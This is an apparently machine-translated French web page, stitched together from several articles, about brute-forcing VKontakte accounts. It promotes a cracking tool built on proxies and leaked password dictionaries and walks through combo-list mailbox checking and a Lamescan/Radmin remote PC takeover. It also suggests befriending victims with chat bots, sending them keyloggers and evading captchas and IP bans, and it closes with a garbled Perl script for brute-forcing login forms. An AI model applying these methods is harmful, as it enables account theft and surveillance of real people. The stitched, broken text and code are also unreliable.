Les meilleurs outils de test de stylet : mots de passe par force brute. Programme gratuit pour pirater VKontakte Téléchargez le programme Brutus pour VKontakte

Caractéristiques du programme :

Prise en charge du travail avec des proxys. Premièrement, cette fonctionnalité vous permet de sélectionner les mots de passe nécessaires dans plusieurs threads, sans craindre la fonctionnalité de protection de VK contre des actions de ce type.

Deuxièmement, le programme dispose de son propre vérificateur de proxy. L'algorithme de fonctionnement de ce vérificateur est extrêmement simple, mais en même temps il nous permet de garantir pleinement la sélection de proxys vraiment efficaces avec le délai d'attente requis. Le programme essaie alternativement de se connecter à VK en utilisant chaque proxy. Les proxys qui ont réussi le test sont considérés comme bons. Il ne fait aucun doute que le programme fonctionnera avec eux avec brio.

À propos, une autorisation sur VKontakte est requise pour vérifier les proxys. Si pour une raison quelconque (et qui sait, peut-être que nous volons votre mot de passe :)) vous ne souhaitez pas utiliser votre propre compte, enregistrez-en simplement un temporaire pour la première fois. Et puis, comme vous l'avez compris, les propriétaires de VKFucker n'ont jamais de difficulté à trouver des comptes frauduleux ;) De plus, il existe plusieurs autres fonctions où l'autorisation est proposée en option. Le fait est que VKontakte est beaucoup plus fidèle aux demandes autorisées. Cela permet à la fois de réduire les pauses nécessaires entre les demandes et d'accéder à la partie de l'information qui n'est pas disponible pour les utilisateurs non enregistrés.

Prise en charge du multithreading.

Cela vous permet d'accélérer le processus de recherche de 20 fois ou plus (la vitesse dépend fortement de la vitesse de réponse de vos proxys et de la vitesse de votre connexion Internet). Ces aspects sont détaillés dans le manuel d'utilisation.

Recherchez les e-mails de VKontakte par identifiant.

Pour de nombreuses personnes, l’une des tâches les plus difficiles consiste à trouver le login d’une brute. La dernière version implémente une version bêta de recherche d'une connexion e-mail par identifiant de compte VKontakte. Le mot clé ici est bêta. Jusqu'à présent, le programme trouve avec succès environ 70 à 75 % des adresses. Nous ne pouvons donc pas encore garantir la pleine fonctionnalité de cette fonction. Cependant, la poursuite des travaux sur cette fonctionnalité constitue notre objectif prioritaire.

Dictionnaires supplémentaires !

Cependant, le point fort de ce programme est qu'il est livré avec un ensemble de dictionnaires spéciaux. Ces dictionnaires ont été rassemblés et constitués au cours de la dernière année. Ils ont été obtenus en déchiffrant un grand nombre de hachages à partir des bases de données de grands sites Runet. Au niveau quotidien, la personne dont vous essayez de connaître le mot de passe a probablement été enregistrée sur l'un de ces sites dont les mots de passe sont déjà dans notre base de données. En lisant ces lignes, vous devez sûrement télécharger constamment quelque chose à partir de divers Varezniks, dont la plupart utilisent un DLE cassé et qui fuit, et vous avez probablement dû vous inscrire auprès de beaucoup d'entre eux, comme plusieurs millions d'autres utilisateurs de RuNet. Pensez maintenant au nombre d’utilisateurs qui utilisent leur mot de passe sur tous les services à la fois. D'après notre expérience, en utilisant ces bases de données, il est possible de deviner plus de 87 % des mots de passe en 36 heures.

Bien sûr, il se peut que le mot de passe que vous recherchez ne soit pas dans la liste, ou avec la vitesse de votre connexion Internet, cela prendra un peu plus de temps que le nôtre. Mais l’ordre des numéros est dans tous les cas le même.

Pour acheter ce produit, vous avez besoin de :

Option 1. Plus pratique et plus rapide.
1). Téléchargez le programme à partir du lien à la fin.
2). Utilisez-le immédiatement après le lancement.
Coût – Je sais tous que le logiciel Happy n’est jamais payé, ce logiciel ne fait pas exception.

Option 2. Plus complexe (pour les crackers de travail)
1). Téléchargez l'archive à partir du lien à la fin
2). d'après le craquement de cette brute
3). Répétez ce qui a été décrit dans mon article
4). Utilisez votre propre logiciel défectueux.
Le coût de l'option est de 10 minutes.

Si soudainement vous tombez quelque part sur une description tentante - Hacked VKFucker - sachez qu'il s'agit d'une arnaque. Au mieux, vous vous retrouverez avec une archive pleine de déchets et éventuellement de virus. Et c'est bien si c'est gratuit. Il en va de même pour la période d'essai du programme. La durée de fonctionnement du programme est suivie sur le serveur, il est donc inutile de changer l'horloge de votre Windows ou de votre BIOS. Cela n'aidera pas.

Malheureusement, je viens de réfuter cette théorie. Preuves ci-dessous.

La force brute (dérivée de l'expression anglaise : force brute) est un type d'attaque de pirate informatique - une méthode de piratage de comptes dans des systèmes informatiques, des services de paiement/bancaires et des sites Web grâce à la sélection automatisée de combinaisons de mots de passe et de connexion.

La force brute est basée sur la méthode mathématique du même nom (force brute), dans laquelle la solution correcte - un nombre fini ou une combinaison symbolique - est trouvée en recherchant parmi diverses options. En fait, l’exactitude de chaque valeur d’un ensemble donné de réponses potentielles (solutions) est vérifiée.

Comment fonctionne la force brute

Un pirate informatique écrit un programme spécial pour deviner les mots de passe ou utilise une solution toute faite de ses collègues. Il peut cibler un service de messagerie, un site Web ou un réseau social spécifique (c'est-à-dire qu'il est destiné au piratage d'une ressource spécifique). Ensuite, les préparatifs pour le piratage sont effectués. Il comprend les étapes suivantes :

  1. Préparation d'une liste de procurations

Afin de masquer la véritable adresse IP de l'ordinateur à partir duquel l'attaque sera effectuée et d'éviter le blocage du site sur lequel le compte doit être piraté, une connexion Internet est configurée via un serveur proxy.

La recherche d'adresses/ports proxy s'effectue dans le Proxy Grabber. Cet utilitaire récupère indépendamment toutes les données de connexion aux serveurs intermédiaires des sites fournissant des proxys (ils sont précisés dans la liste). Autrement dit, un proxy est collecté.

La base de données résultante est enregistrée dans un fichier texte séparé. Et puis toutes les adresses de serveur qu'il contient sont vérifiées pour leur fonctionnalité dans le vérificateur de proxy. Très souvent, les programmes conçus pour l'extraction automatisée de proxy combinent les fonctions à la fois de grabber et de checker.

En conséquence, vous obtenez une liste de proxys prête à l'emploi sous la forme d'une liste d'IP/ports, enregistrée dans un fichier txt. (Vous en aurez besoin lors de la configuration du programme de force brute).

  1. Rechercher des bases pour Brute

Vous devez connecter un dictionnaire à la force brute - un certain ensemble de combinaisons de mots de passe et de connexions - qu'il remplacera dans le formulaire de connexion. Comme la liste de proxy, elle se présente sous la forme d'une liste dans un fichier texte ordinaire (.txt). Les dictionnaires, également appelés bases de données, sont distribués via des forums de hackers, des sites Web et des services d'hébergement de fichiers. Des « artisans » plus expérimentés les créent eux-mêmes et les fournissent à tout le monde moyennant des frais. Plus la base est grande (nombre de combinaisons, de connexions, de comptes), mieux c'est (pour le pirate informatique) - plus la probabilité de succès du piratage est grande.

  1. Mise en place de la force brute

La liste de proxy est chargée ; le programme de sélection changera automatiquement le proxy afin que le serveur Web ne détecte pas l'attaque et, par conséquent, la source (hôte) de l'attaque.

Un dictionnaire de combinaisons mot de passe/identifiant est connecté. Le nombre de threads est défini - combien de combinaisons la force brute vérifiera en même temps. Un ordinateur puissant doté d'une vitesse Internet élevée peut gérer en toute confiance 120 à 200 flux (c'est la valeur optimale). La vitesse de la brute dépend directement de ce réglage. Par exemple, si vous définissez seulement 10 threads, la sélection sera très lente.

  1. Exécuter la force brute

Le programme enregistre les tentatives de piratage réussies : il enregistre les comptes liés (mot de passe/login) dans un fichier. La durée de la procédure de sélection varie de plusieurs heures à plusieurs jours. Cependant, cette méthode n’est pas toujours efficace en raison de la force cryptographique élevée des données de connexion ou de la mise en œuvre d’autres mesures de protection par l’attaquant.

Types de force brute

Piratage personnel

Recherche d'un compte spécifique - sur un réseau social, sur un service de messagerie, etc. Grâce ou en cours de communication virtuelle, l'attaquant extrait de la victime un identifiant pour accéder à un site Web. Ensuite, il déchiffre le mot de passe en utilisant des méthodes de force brute : il utilise la force brute pour indiquer l'adresse de la ressource Web et le login obtenu, et connecte le dictionnaire.

Les chances d’un tel piratage sont faibles, par exemple, par rapport à la même attaque XSS. Cela peut réussir si le propriétaire du compte utilise un mot de passe de 6 à 7 caractères avec une simple combinaison de symboles. Sinon, "résoudre" des variantes plus stables de 12, 15, 20 lettres, chiffres et caractères spéciaux prendra des années - des dizaines et des centaines d'années, sur la base des calculs de la formule de recherche mathématique.

Brut/chèque

Une base de données avec les identifiants/mots de passe des boîtes aux lettres d'un service de messagerie (par exemple, mail.ru) ou de différents services est connectée par force brute. Et une liste de proxy - pour masquer le nœud (puisque les services Web de messagerie détectent rapidement une attaque basée sur plusieurs requêtes provenant d'une même adresse IP).

Les options de la brute indiquent une liste de mots-clés (généralement des noms de sites) - des repères par lesquels il recherchera des informations de connexion sur des boîtes aux lettres piratées (par exemple : steampowered, worldoftanks, 4game, VK). Ou une ressource Internet spécifique.

Lors de son inscription à un jeu en ligne, un réseau social ou un forum, un utilisateur indique, comme prévu, son email (boîte aux lettres). Le service Web envoie un message à l'adresse spécifiée avec les informations de connexion et un lien pour confirmer l'inscription. Ce sont ces lettres que recherche la force brute afin d'en extraire les identifiants et les mots de passe.

Cliquez sur « START » et le programme de craquage commence par force brute. Il fonctionne selon l'algorithme suivant :

  1. Charge le login/mot de passe de l'e-mail à partir de la base de données.
  2. Vérifie l'accès, ou « vérifie » (se connecte automatiquement) : s'il est possible de se connecter au compte, il en ajoute un dans la colonne bon (cela signifie qu'un autre email professionnel a été trouvé) et commence à le visualiser (voir les points suivants ); s'il n'y a pas d'accès, il est répertorié comme mauvais.
  3. Dans tous les « bips » (e-mails ouverts), la force brute analyse les lettres selon la demande spécifiée par le pirate informatique, c'est-à-dire qu'elle recherche les identifiants/mots de passe pour les sites et systèmes de paiement spécifiés.
  4. Lorsque les données requises sont trouvées, il les copie et les écrit dans un fichier séparé.

Ainsi, un « détournement » massif de comptes se produit – de plusieurs dizaines à plusieurs centaines. L'attaquant dispose des « trophées » obtenus à sa propre discrétion - vente, échange, collecte de données, vol d'argent.

Piratage informatique à distance

La force brute, en conjonction avec d’autres utilitaires de pirate informatique, est utilisée pour accéder à distance au PC d’une victime protégée par mot de passe via un canal Internet.

Ce type d'attaque comprend les étapes suivantes :

  1. Une recherche est effectuée sur les réseaux IP dans lesquels l'attaque sur les ordinateurs des utilisateurs sera effectuée. Les plages d'adresses sont extraites de bases de données spéciales ou via des programmes spéciaux, tels que IP Geo. Vous pouvez y sélectionner des réseaux IP pour un district, une région et même une ville spécifique.
  2. Les plages IP sélectionnées et les dictionnaires de sélection sont définis dans les paramètres de la force brute Lamescan (ou son analogue), destinés à la connexion/mot de passe par force brute à distance. Une fois lancé, Lamescan effectue les opérations suivantes :
  • établit une connexion à chaque IP à partir d'une plage donnée ;
  • après avoir établi une connexion, il essaie de se connecter à l'hôte (PC) via le port 4899 (mais il peut y avoir d'autres options) ;
  • si le port est ouvert : tente d'accéder au système, lorsqu'on lui demande un mot de passe, effectue une devinette ; en cas de succès, il enregistre l'adresse IP de l'hôte (ordinateur) et les informations de connexion dans sa base de données.

  1. Le hacker lance l'utilitaire Radmin, conçu pour gérer les PC distants. Définit les coordonnées réseau de la victime (IP, identifiant et mot de passe) et obtient un contrôle total sur le système - le bureau (affiché visuellement sur l'écran de l'ordinateur de l'attaquant), les répertoires de fichiers, les paramètres.

Programmes pour Brutus

Force brute classique, l'une des toutes premières. Cependant, il ne perd pas de sa pertinence et concurrence les nouvelles solutions. Il dispose d'un algorithme de force brute rapide et prend en charge tous les principaux protocoles Internet - TCP/IP, POP3, HTTP, etc. Il peut falsifier des cookies. Brut le dictionnaire et génère des mots de passe de manière indépendante.

Puissant vérificateur de brutes. Equipé d'un arsenal étendu de fonctions pour travailler avec des bases de données (vérification, tri par domaine). Prend en charge différents types de proxys et vérifie leur fonctionnalité. Analyse les lettres dans les boîtes aux lettres en fonction de paramètres tels que la date, le mot-clé, l'adresse et les messages non lus. Peut télécharger des lettres de Mail.ru et Yandex.

Déverrouillage de mot de passe Appnimi

Un programme permettant de forcer brutalement un mot de passe pour un fichier sur un ordinateur local. Une sorte de bête de somme. La version gratuite du programme vous permet de sélectionner des mots de passe de 5 caractères maximum. Vous pouvez lire comment installer et utiliser Appnimi Password Unlocker

Oui, ça existe. De manière générale, il existe de nombreux programmes de ce type.

Et nous sommes contre de tels programmes.

Mais comme il existe une certaine demande pour de tels programmes, regardons lesquels d’entre eux sont « relativement » légaux et lesquels il est préférable de ne pas utiliser du tout.
Initialement, dès la création de VKontakte, il existait, par exemple, des programmes tels que les applications de force brute.
Ces programmes recherchent tous les mots de passe existants. Pour cela, on utilise à la fois des algorithmes pas à pas conventionnels et des algorithmes dits. Tableaux arc-en-ciel dans lesquels les valeurs sont dispersées aléatoirement selon la meilleure distribution - selon les auteurs des derniers programmes, la distribution aléatoire peut réduire le temps de recherche d'un mot de passe, car la recherche ne démarrera pas dès le début, mais au hasard, et en moyenne le chemin vers la lettre souhaitée sera plus court.
Nous ne recommandons pas du tout d'utiliser des programmes de force brute. Il existe une variété de programmes pour pirater VKontakte, et il est donc préférable de ne pas utiliser de manière grossière la « pénétration » d'une page ; en outre, l'utilisateur lui-même peut soupçonner quelque chose et supprimer la page, en créer une autre ou modifier son adresse. Et en outre, L'administration VK vous bloquera par IP et pourra entamer des poursuites judiciaires pour avoir attaqué les serveurs de connexion et violé leur stabilité, ainsi que pour avoir tenté de pénétrer dans la correspondance de quelqu'un d'autre.

Ainsi, les programmes permettant de pirater VKontakte en utilisant la force brute sont illégaux. Quels autres y a-t-il ?

En général, vous aurez toujours le temps de télécharger gratuitement le programme de piratage VKontakte. Il y en a vraiment beaucoup. Examinons les moyens légaux disponibles pour pénétrer dans la page de quelqu'un d'autre.
Tout d’abord, ce sont des applications. Les applications regorgent d’informations sur l’utilisateur. En règle générale, les utilisateurs ne lisent pas les invites présentées avant de lancer l'application. Et là, l'application bénéficie d'un accès complet aux données personnelles, à la liste d'amis, au mur, etc. Les messages personnels restent bien sûr inconnus de l'application, mais Connaissant la quantité colossale d'informations personnelles auparavant cachées derrière les paramètres de confidentialité, vous pouvez commettre des escroqueries dans le domaine de l'ingénierie sociale et « attirer » des informations sur l'utilisateur auprès de ses amis les plus proches.
Cependant, ce n'est pas tout à fait légal - des problèmes peuvent survenir du fait que si l'utilisateur S'il devine que c'est l'application qui a divulgué les données, il déposera bien entendu une plainte contre elle et l'application sera bloquée. En général, la méthode est bonne, mais elle tombe rapidement sous le coup des soupçons. Oui et faire une demande est toujours un problème.
Poursuivre.

Où puis-je normalement télécharger un programme de piratage des pages VKontakte qui sera légal ?

Tout d’abord, soyons clairs : nous ne nous contentons que de l’ingénierie sociale. Fondamentalement, si elle est utilisée correctement, l'ingénierie sociale nous aidera à extraire toutes les données dont nous avons besoin d'un utilisateur sans pirater sa page. Bien que vous puissiez également obtenir un accès complet à la page.
Alors, quels programmes sociaux existe-t-il pour pirater VKontakte que vous pouvez télécharger gratuitement ?
Tout d’abord, il convient de noter le robot Brobot.
L'utiliser pour le piratage est bien sûr une méthode plutôt étrange pour contrôler ce programme, mais en principe, La fonctionnalité y est nécessaire et suffisante pour le piratage.
Nous pouvons « opposer » le bot à l'utilisateur lui-même, à ses amis, en utilisant les capacités d'ajout d'amis et de correspondance personnelle. Connectons le bot III pour les conversations, en lui donnant le ton le plus convivial. Et après cela, vous pouvez déjà en récolter les bénéfices en apprenant beaucoup de choses intéressantes sur l'utilisateur dans l'historique des correspondances que Brobot a enregistré.
Après cela, vous pouvez envoyer à l'utilisateur, par exemple, keylogger et attraper ce qu'il écrit aux autres utilisateurs– en fait, après cela, vous n’aurez plus besoin de télécharger de programmes spéciaux pour pirater VKontakte. Il suffira simplement de surveiller l'utilisateur. Cependant, vous pouvez aussi vous passer d'un keylogger !

Comment les programmes de piratage de VKontakte comme Brobot peuvent-ils nous aider ?

Tout d'abord, définissons ce que Brobot ne pirate pas les pages. Toutes nos activités sont absolument légales, personne ne peut nous poursuivre en justice, personne ne peut nous bloquer - tout est absolument juste (dans la mesure où nous en avons besoin).
Nous créons simplement en fait plusieurs pages (il vaut mieux acheter immédiatement en illimité, c'est garanti pour augmenter le volume d'informations extraites), et à partir d'elles nous communiquons déjà avec l'utilisateur, qui nous permet de connaître son attitude envers diverses personnalités, ainsi que d'obtenir un portrait de lui-même, de ses amis, de ses proches, etc. - et c'est essentiellement ce dont nous avons besoin. Et à l'avenir, vous pourrez effectuer des actions encore plus intéressantes et complexes, et ici tout dépend de vos désirs et de votre imagination.
Le programme Brobot deviendra votre bon assistant, et l'équipe d'assistance Brobot, disponible presque 24 heures sur 24, répondra à toutes vos questions techniques.

Brut VK est un logiciel qui sélectionne automatiquement les mots de passe pour tous les comptes VKontakte. Le nom complet de ces applications est Bruteforce. Ils sont conçus pour pirater les profils d’un utilisateur particulier sur un site de réseau social. Il existe de nombreux programmes de ce type, mais la plupart sont absolument inefficaces. Cependant, avec le bon utilitaire, vous obtiendrez toutes les informations cachées. La fonctionnalité ici est assez simple et le piratage est facile.

Qu'est-ce que la Brute "VK"

Brute est un logiciel spécial qui sélectionne les mots de passe pour les connexions, les e-mails, etc. en tapant diverses combinaisons de lettres et de chiffres. Si vous définissez un mot de passe complexe, le programme mettra beaucoup de temps à le deviner et risque de ne pas terminer la tâche. Le résultat d’une force brute est largement influencé par la puissance de la technique utilisée pour le piratage et par la stabilité de la connexion Internet. Le processus de piratage peut durer quelques minutes ou une journée entière. Si vous définissez un mot de passe très complexe, par exemple : RKGJH4hKn2, un logiciel spécial risque de ne pas pouvoir le déchiffrer du tout.

Qu'est-ce qu'une base

Pour que Bruteforce fonctionne, il doit disposer de données ; Si elle n’a pas le choix des codes, elle ne fera rien. Une base est un ensemble de différentes combinaisons de codes et de connexions. Si la liste est énorme, tôt ou tard, vous piraterez votre compte à l'aide de l'application. Les combinaisons ont la plus petite longueur de trois lettres et chiffres. La longueur la plus longue atteint 16 caractères. Cela dépend de la version du logiciel. La sélection du code commence par la lettre « A » et se termine par la dernière lettre de l'alphabet. Les lettres peuvent être russes ou anglaises. Ce sont les principales informations utiles sur la base de données.

Qui en a besoin

Tous les utilisateurs ont leurs propres raisons de pirater les profils VK d'autres personnes. Certaines personnes le font pour s'amuser, d'autres veulent lire la correspondance. De plus, certaines personnes souhaitent envoyer des messages invalides. Une chose à garder à l’esprit est que le Brut est illégal. Vous devrez toujours répondre du vol. Il vaut mieux ne pas faire ça. Tout compte piraté peut être facilement restauré. Surtout si de véritables informations ont été fournies lors de son inscription. C’est plus difficile avec des profils créés rapidement et contenant de fausses données, mais les pirates n’en ont généralement pas besoin.

Ils volent des informations sur une page du réseau social VK uniquement si elles intéressent quelqu'un. Les pirates vendent généralement des comptes volés à leurs clients en grande quantité. Ils peuvent ensuite les revendre aux propriétaires s’ils contiennent des informations importantes. Les pirates essaient toujours de se protéger et d'utiliser un serveur proxy. Avec son aide, personne ne les remarquera, car l'adresse IP sera inconnue.

Si vous souhaitez vous protéger des attaquants, rendez votre mot de passe long et complexe. N'utilisez pas votre propre compte VK sur un réseau où d'autres personnes ont accès à l'ordinateur. De plus, vous ne devez pas enregistrer votre mot de passe dans le navigateur, il peut être facilement intercepté. Si vous avez reçu un SMS sur votre téléphone concernant la connexion à votre profil VK, mais que vous ne l'avez pas fait, modifiez immédiatement votre mot de passe. Essayez de le faire le plus rapidement possible. De cette façon, vous vous protégerez contre la perte de données personnelles importantes.

Force brute - force brute, piratage par force brute
Dans l'article "", il a été dit que le piratage de VK en utilisant la force brute (programme) est impossible.
Ce n'est pas tout à fait vrai, il y a encore des failles...
Vous trouverez ci-dessous un script fonctionnel, mais d'abord...

Au bas de l'article se trouve un programme gratuit permettant de générer un dictionnaire brut et une liste des « meilleurs mots de passe »

Je fais une réserve à l'avance sur le fait que nous parlons d'une « force brute » classique sans aucun algorithme PBKDF2, sans analyser le hachage sha, car au niveau quotidien, c'est une tâche écrasante.

Il existe de nombreux programmes circulant sur Internet « pour pirater VK en utilisant la force brute (force brute) »

Lequel choisir ? Lequel m'aidera (sans me faire de mal) ?
- Aucun

Chaque compte VK nécessite une approche personnelle et les programmes modèles du réseau sont tous de la merde, des arnaques et des conneries.

Vous comprendrez maintenant pourquoi. Partie mathématique brièvement.

La longueur minimale d'un mot de passe VK est de 6 caractères.

Le mot de passe doit contenir :
Nombres(0-9 - 10 options),
des lettres(a-z - 26 en latin),
lettres majuscules(A-Z - également 26)

Total pour chaque symbole - 10+26+26=62 (!) options, donc le nombre de combinaisons pour :
Mot de passe à 6 caractères - 56 800 235 584 (56,8 milliards)
Mot de passe à 7 caractères - 3 521 614 606 208 (3,5 billions)
Mot de passe à 8 caractères - 218 340 105 584 896 (218 000 milliards)
Mot de passe à 9 caractères -13 537 086 546 263 600 (HZ comme on l'appelle))))

Nous ne connaissons pas la longueur du mot de passe, nous devrons donc forcer brutalement une plage d'au moins 6 à 8 caractères
Total : 6+7+8 caractères = 221 918 520 426 688 (222 000 milliards) d'options

Disons que vous disposez d'un assez bon ordinateur, mais la question se pose : combien de requêtes au serveur VK peut-il effectuer ?
Quelle est la vitesse de recherche d’un ordinateur domestique ?

Faisons le calcul. Pour cela, ouvrez la ligne de commande (Démarrer – standard – Invite de commandes ou lancez le processus cmd.exe)
Entrez la commande et obtenez la réponse du serveur

"Réponse à partir de .....temps 134 ms" (c'est pour moi, votre temps peut différer)

Le temps de ping est le temps nécessaire au signal pour voyager de notre machine au serveur et vice-versa.

Il y a 1 000 millisecondes (ms) dans une seconde, donc
La vitesse brute de votre machine (requêtes/s) sera = 1 000/temps de réponse
Dans mon cas, 1000/134 ms = 7,4 requêtes (mots de passe) par seconde

Combien de temps faudra-t-il pour rechercher les mots de passe pour VK ?

Permettez-moi de vous rappeler que nous testons 221 918 520 426 688 (222 000 milliards) d’options de mot de passe.

Par conséquent, pour savoir combien nous allons casser le mot de passe VK par force brute, nous divisons le montant par la vitesse, c'est-à-dire

221918520426688 mots de passe / 7,4 mots de passe par seconde = 29737081737176sec = 495618028953 min = 8260300483 heures = 344179187 jours = 942957 ans

Conclusion:un véritable programme de piratage de VK pourrait trouver un mot de passe par force brute dans 94 000 ans.

Question : Qu'en est-il des vidéos sur YouTube dans lesquelles des programmes miracles forcent brutalement une page VK en quelques minutes/heures ?
Je réponds : Il s'agit d'une arnaque créée dans le but d'infecter votre ordinateur pour voler vos propres données. Ni plus ni moins.

Vous pouvez accélérer considérablement le processus de recherche !
Pour ce faire, vous avez besoin de :
1. Augmentez la puissance de calcul. Par exemple, infectez 1 000 000 ordinateurs d’autres personnes et forcez simultanément VK sur chacun d’eux (c’est drôle)
2. Raccourcissez le dictionnaire Brute à, par exemple, quelques milliers (basé sur le principe de l'ingénierie sociale)

Comment faire un dictionnaire Brute ?
1. Utilisation de stylets dans le programme Bloc-notes (notepad.exe)
2. Prog « générateur brutus » (lien en bas de l'article)

Nous remplissons ce dictionnaire brut d’options réelles.

Les vrais sont ceux qui sont au moins d'une manière ou d'une autre liés à la personne piratée :

-Téléphone (s(lui, ses proches, amis)
Exemple- nombres avec +7, 8, sans 8 - rarement vu

- dates de naissance(lui, ses proches, ses proches)
Exemple- (même date) 010118, 01012018, 20180101, 180101 - apparaît souvent

- Noms des proches
Exemple- SashaMaria, MariaIvanova, SaNoMaIv - se situe dans la moyenne

Nom du site (ou nom de famille) sur une mise en page différente
Exemple, si vous tapez le mot « vkontakte » sur le clavier russe, vous obtiendrez « mlshtefleu » - un tel schéma se retrouve très souvent sur tous les sites.

- Liste des mots de passe de Lokhov pour Brutus(liste des mots de passe les plus courants sur Internet - lien en fin d'article)

Combien de temps faut-il pour rédiger un dictionnaire ? Eh bien, pas vraiment, une demi-heure suffit. Qui a dit que ce serait facile ?))

Disons que nous avons un dictionnaire brut créé et un programme de travail pour sélectionner un mot de passe VK (ou le saisir manuellement à l'aide d'un dictionnaire).

Un problème important se pose : le système de sécurité du serveur.

En fait, son frein réside dans le fait que si les requêtes sont trop fréquentes, le serveur bloque bêtement (temporairement) votre IP. De plus, si vous travaillez avec VK via un formulaire de saisie standard (HTML\FORM), après la 3ème tentative infructueuse, VK vous demandera de saisir un captcha.

Dans l'ancienne version de VK, vous pouviez simplement passer à la version mobile - m.vk.com, mais il n'existe désormais plus de version mobile en tant que telle - en 2016, ils ont réalisé une seule conception adaptative.

Comment contourner le captcha de VKontakte ?

VK nécessite la saisie d'un captcha après 3 tentatives infructueuses (le redémarrage de F5 n'aide pas), mais comment sait-il que c'est toi Essayez-vous de vous connecter plusieurs fois ?

Par IP
- par cookies, cache et JavaScript

Il n'y a aucun problème avec les cookies, le cache et JavaScript - vous pouvez simplement les désactiver dans les paramètres de votre navigateur.

L'IP peut être modifiée en installant un programme pour changer l'IP - il n'y a rien de compliqué là-dedans, il y en a beaucoup sur Internet (Google peut vous aider)

Vous pouvez utiliser le navigateur TOR (pour ceux qui ne le savent pas, c'est un navigateur pour surfer anonymement sur le réseau, il change également les numéros IP à chaque nouvelle session, une chose utile surtout pour ceux qui surfent ou travaillent en SAR)

Mais toutes les tentatives de force brute sont presque totalement annulées par la GEOLOCATION.

Le serveur VK se souvient de l'endroit (géographique) de la dernière connexion.

Et si votre adresse IP provient d’une autre localité, alors (éventuellement) le message suivant apparaîtra :

"Vous essayez de vous connecter sous le nom d'Ivan Ivanov depuis un endroit inhabituel."

Pour confirmer que vous êtes bien le propriétaire de la page, veuillez fournir tous les chiffres manquants du numéro de téléphone auquel la page est liée.

Script pour les formulaires Web bruts (tels qu'un programme de piratage de VK)

Important! Sur le serveur VK, il existe un script qui surveille la fréquence d'envoi des paquets, c'est-à-dire si vous martelez à une vitesse de N fois/sec, vous serez automatiquement envoyé sur la liste des interdictions IP.
VK utilise également le suivi GEO.

Sans IP dynamique, vous ne devriez pas essayer de brutaliser, un VPN peut vous aider.
Personnellement, je considère que le forçage brutal des mots de passe VK n'est pas prometteur, mais pour les connaisseurs, je publierai un vieux script Perl emprunté à 5p4x2knet a.k.a. Apocalyptique et un peu corrigé.

Le script fonctionne en utilisant la méthode POST uniquement dans deux paramètres : se connecter Et mot de passe.

Si le login est connu (par exemple, un numéro de téléphone), alors remplissez simplement les champs correspondants avec la valeur sans vous référer au dictionnaire.

Champs cachés - captcha, le script ne transmettra pas d'images, masquera la source des requêtes (vous-même) comme décrit ci-dessus.

Ici, nous aurons besoin du dictionnaire sain d'esprit Brute que nous avons compilé au début de l'article. (appelons-le, par exemple, brutal.txt )

Nous avons également besoin d'un fichier à partir duquel notre programme recevra des informations.

Le programme forcera brutalement tous les scripts spécifiés dans ce fichier.( info.txt). S'il n'y a qu'un seul script, vous pouvez alors remplacer

Bien entendu, le fichier d'enregistrement des résultats ( résultat.txt)

Donc,
{
#connecter l'objet
$usagent = LWP :: UserAgent
#ouvrez le fichier avec les informations (si nous ne pouvons pas l'ouvrir, alors quittez) ;
# videz le fichier dans le tableau @infa et fermez-le. (s'il n'y a qu'un seul script, alors vous pouvez le spécifier immédiatement)
ouvert(INFA, ";
fermer(INFA);

#ouvrez le dictionnaire Brute
ouvert(BRUT, ";
fermer(BRUT);

#ouverture d'un fichier avec les résultats (ajouté à la fin).
ouvert(RESULTAT, ">>$ARGV");
#début du cycle
foreach $nom (@infa)
{
#URL séparée, connexion, variables et informations d'erreur
($url, $login, $log_vr, $pwd_vr, $failed) = split(//, $name);
#afficher l'URL
imprimer "$url...n" ;
#commencer un autre cycle
foreach $brut (@brut)
{
#kill les espaces et les sauts de ligne
$pss =~s/ //;
$pss =~ s/n//;

#connecter un nouvel objet
$usagent = LWP::UserAgent->new();
#création de requêtes.
$req = HTTP::Request->new(POST=>$url);
$req->content_type("application/x-www-form-urlencoded");
$req->content("$log_vr=$login&$pwd_vr=$pss");

#et son envoi
$result = $usagent -> request($req);
#stockage des résultats dans une variable
$res = $result->contenu ;
#si cela ne fonctionne pas, un message d'erreur est généré
si($res!~ /$échec/i)
{
#message de sortie avec mot de passe ; enregistrer les résultats ;
print "mot brut trouvé. Ce n'est pas $pssnn";
print RESULT "URL : $urlnLOGIN : ​​$loginnBRUT : $pssnn" ;

#sinon sélection continue
dernier;
}
}
}
#fermeture du fichier result.txt
fermer(RESULTAT);



Avoir des questions?

Signaler une faute de frappe

Texte qui sera envoyé à nos rédacteurs :